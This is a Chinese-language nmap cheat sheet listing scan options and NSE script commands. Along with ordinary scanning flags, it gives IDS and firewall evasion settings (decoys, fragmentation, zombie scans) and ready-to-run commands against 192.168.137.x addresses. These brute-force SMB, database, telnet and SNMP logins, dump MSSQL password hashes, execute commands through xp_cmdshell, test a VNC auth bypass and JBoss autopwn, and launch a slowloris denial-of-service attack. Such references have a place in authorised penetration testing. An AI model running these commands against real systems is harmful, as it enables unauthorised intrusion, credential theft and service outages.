常用指令

1. nmap -sT ip //TCP连接扫描,不安全,慢
2. nmap -sS ip  //SYN扫描,使用最频繁,安全,快
3. nmap -Pn ip  //目标机禁用ping,绕过ping扫描
4. nmap -sU ip  //UDP扫描,慢,可得到有价值的服务器程序
5. nmap -sI 僵尸ip 目标ip  //使用僵尸机对目标机发送数据包
6. nmap -sA ip //检测哪些端口被屏蔽
7. nmap ip -p <portnumber>  //对指定端口扫描
8. nmap ip/24 //对整个网段的主机进行扫描
9. nmap ip -oX myscan.xml //对扫描结果另存在myscan.xml
10. nmap -T1~6 ip //设置扫描速度,一般T4足够。
11. nmap -sV ip  //对端口上的服务程序版本进行扫描
12. nmap -O ip  //对目标主机的操作系统进行扫描
13. nmap -sC <scirptfile> ip  //使用脚本进行扫描,耗时长
14. nmap -A ip  //强力扫描,耗时长
15. nmap -6 ipv6地址   //对ipv6地址的主机进行扫描
16. nmap -f ip  //使用小数据包发送,避免被识别出
17. nmap –mtu <size> ip //发送的包大小,最大传输单元必须是8的整数
18. nmap -D <假ip> ip //发送参杂着假ip的数据包检测
19. nmap --source-port <portnumber> //针对防火墙只允许的源端口
20. nmap –data-length: <length> ip //改变发生数据包的默认的长度,避免被识别出来是nmap发送的。
21. nmap -v ip //显示冗余信息(扫描细节)
22. nmap -sn ip  //对目标进行ping检测,不进行端口扫描(会发送四种报文确定目标是否存活,)
23. nmap -sP ip  //仅仅对目标进行ping检测。
24. nmap -n/-p ip  //-n表示不进行dns解析,-p表示要
25. nmap --system-dns ip  //扫描指定系统的dns服务器
26. nmap –traceroute ip  //追踪每个路由节点。
27. nmap -PE/PP/PM: 使用ICMP echo, timestamp, and netmask 请求包发现主机。
28. nmap -sP ip       //主机存活性扫描,arp直连方式。
29. nmap -iR [number]       //对随机生成number个地址进行扫描。


-T0 (偏执的):非常慢的扫描,用于IDS逃避。
-T1 (鬼祟的):缓慢的扫描,用于IDS逃避。
-T2 (文雅的):降低速度以降低对带宽的消耗,此选项- -般不常用。
-T3 (普通的):默认,根据目标的反应自动调整时间。
-T4 (野蛮的):快速扫描,常用扫描方式,需要在很好的网络环境下进行扫描,请求可能会淹没目标。
-T5 (疯狂的):极速扫描,这种扫描方式以牺牲准确度来提升扫描速度。

脚本整理
(1) nmap --script=auth 192.168.137.*
负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
(2)nmap --script=brute 192.168.137.*
提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解
(3)nmap --script=default 192.168.137. 或者 nmap -sC 192.168.137.
默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击
(4)nmap --script=vuln 192.168.137.*
检查是否存在常见漏洞
(5)nmap -n -p445 --script=broadcast 192.168.137.4
在局域网内探查更多服务开启状况
检查vnc bypass
nmap --script=realvnc-auth-bypass 192.168.137.4
(1)检查vnc认证方式
nmap --script=vnc-auth 192.168.137.4
获取vnc信息
nmap --script=vnc-info 192.168.137.4
(2)smb扫描:
smb破解
nmap --script=smb-brute.nse 192.168.137.4
smb字典破解
nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
smb已知几个严重漏
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4
查看共享目录
nmap -p 445 --script smb-ls --script-args ‘share=e$,path=,smbuser=test,smbpass=test’ 192.168.137.4
查看会话
nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
系统信息
nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
(3)Mssql扫描:
猜解mssql用户名和密码
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
xp_cmdshell 执行命令
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4
(4)dumphash值
nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 192.168.137.4
扫描root空口令
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4
列出所有mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4
(5)Oracle扫描:
oracle sid扫描
nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5
oracle弱口令破解
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5
(6)其他一些比较好用的脚本
  nmap --script=broadcast-netbios-master-browser 192.168.137.4 发现网关
  nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 破解rsync
  nmap --script informix-brute -p 9088 192.168.137.4 informix数据库破解
  nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解
  nmap -sU --script snmp-brute 192.168.137.4 snmp破解
  nmap -sV --script=telnet-brute 192.168.137.4 telnet破解
  nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target> jboss autopwn
  nmap --script=http-methods.nse 192.168.137.4 检查http方法
  nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections
  nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4
  nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445

NMAP结构图
Nmap.png